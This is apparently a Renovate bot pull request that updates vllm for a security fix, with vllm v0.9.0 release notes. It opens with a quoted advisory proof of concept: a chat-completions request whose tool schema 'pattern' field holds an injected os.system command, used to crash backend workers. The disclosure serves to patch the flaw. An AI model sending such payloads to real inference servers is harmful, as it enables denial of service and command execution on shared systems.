Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer:
Content-Type: application/json
Content-Length: 718
Origin:
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
Connection: keep-alive

{
  "model": "mistral-nemo-instruct",
  "messages": [
    {
      "role": "user",
      "content": "Crash via Pattern"
    }
  ],
  "tools": [
    {
      "type": "function",
      "function": {
        "name": "crash02",
        "parameters": {
          "type": "object",
          "properties": {
            "a": {
              "type": "string",
              "pattern": "{{ import('os').system('echo RCE_OK > /tmp/pwned') or 'SAFE' }}"
            }
          }
        }
      }
    }
  ],
  "tool_choice": {
    "type": "function",
    "function": {
      "name": "crash02"
    }
  },
  "stream": false,
  "max_tokens": 32,
  "temperature": 0.2,
  "top_p": 1,
  "n": 1
}

Impact

Backend workers can be crashed, causing anyone using the inference engine to receive 500 internal server errors on subsequent requests.

Fix


Release Notes

vllm-project/vllm (vllm)

v0.9.0

Compare Source

Highlights

This release features 649 commits, from 215 contributors (82 new contributors!)

  • vLLM has upgraded to PyTorch 2.7! (#16859) This is a breaking change for environment dependencies.
    • The default wheel has been upgraded from CUDA 12.4 to CUDA 12.8. We will distribute a CUDA 12.6 wheel as a GitHub artifact.
    • As a general rule of thumb, our CUDA version policy follows PyTorch's CUDA version policy.
  • Enhanced NVIDIA Blackwell support. vLLM now ships with an initial set of optimized kernels for NVIDIA Blackwell, covering both attention and MLP.
    • You can use our Docker image, or install the FlashInfer nightly wheel with pip install https://download.pytorch.org/whl/cu128/flashinfer/flashinfer_python-0.2.5%2Bcu128torch2.7-cp38-abi3-linux_x86_64.whl and then set VLLM_ATTENTION_BACKEND=FLASHINFER for better performance.
    • Upgraded support for the new FlashInfer main branch. (#15777)
    • Please check out https://github.com/vllm-project/vllm/issues/18153 for the full roadmap
  • Initial DP, EP, PD support for large scale inference
    • EP:
      • Permute and unpermute kernel for moe optimization (#14568)
      • Modularize fused experts and integrate PPLX kernels (#15956)
      • Refactor pplx init logic to make it modular (prepare for deepep) (#18200)
      • Add ep group and all2all interface (#18077)
    • DP:
      • Decouple engine process management and comms (#15977)
    • PD:
  • Migrate docs from Sphinx to MkDocs (#18145, #18610, #18614, #18616, #18622, #18626, #18627, #18635, #18637, #18657, #18663, #18666, #18713)
Notable Changes
  • Removal of CUDA 12.4 support due to PyTorch upgrade to 2.7.
  • Change top_k to be disabled with 0 (still accept -1 for now) (#17773)
  • The seed is now set to 0 by default for V1 Engine, meaning that different vLLM runs now yield the same outputs even if temperature > 0. This does not modify the random state in user code since workers are run in separate processes unless VLLM_USE_V1_MULTIPROCESSING=0. (#17929, #18741)
Model Enhancements
Performance, Production and Scaling
  • Support full cuda graph in v1 (#16072)
  • Pipeline Parallelism: MultiprocExecutor support (#14219), torchrun (#17827)
  • Support sequence parallelism combined with pipeline parallelism (#18243)
  • Async tensor parallelism using compilation pass (#17882)
  • Perf: Use small max_num_batched_tokens for A100 (#17885)
  • Fast Model Loading: Tensorizer support for V1 and LoRA (#17926)
  • Multi-modality: Automatically cast multi-modal input dtype before transferring device (#18756)
Security
  • Prevent side-channel attacks via cache salting (#17045)
  • Fix image hash collision in certain edge cases (#17378)
  • Add VLLM_ALLOW_INSECURE_SERIALIZATION env var (#17490)
  • Migrate to REGEX Library to prevent catastrophic backtracking (#18454, #18750)
Features
Hardwares
Documentation
  • Update quickstart and install for cu128 using --torch-backend=auto (#18505)
  • NVIDIA TensorRT Model Optimizer (#17561)
  • Usage of Qwen3 thinking (#18291)
Developer Facing

What's Changed


Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Enabled.

Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.


  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

@renovate renovate bot force-pushed the renovate/pypi-vllm-vulnerability branch from c2ec817 to 305da83 on May 1, 2025 00:09
@renovate renovate bot changed the title from "Update dependency vllm to v0.8.4 [SECURITY]" to "Update dependency vllm to v0.8.5 [SECURITY]" on May 1, 2025
@renovate renovate bot force-pushed the renovate/pypi-vllm-vulnerability branch from 305da83 to 6261197 on May 31, 2025 23:44
@renovate renovate bot changed the title from "Update dependency vllm to v0.8.5 [SECURITY]" to "Update dependency vllm to v0.9.0 [SECURITY]" on May 31, 2025
@renovate renovate bot changed the title from "Update dependency vllm to v0.9.0 [SECURITY]" to "Update dependency vllm to v0.9.0 [SECURITY] - autoclosed" on Jul 10, 2025
@renovate renovate bot closed this Jul 10, 2025
@renovate renovate bot deleted the renovate/pypi-vllm-vulnerability branch July 10, 2025 13:41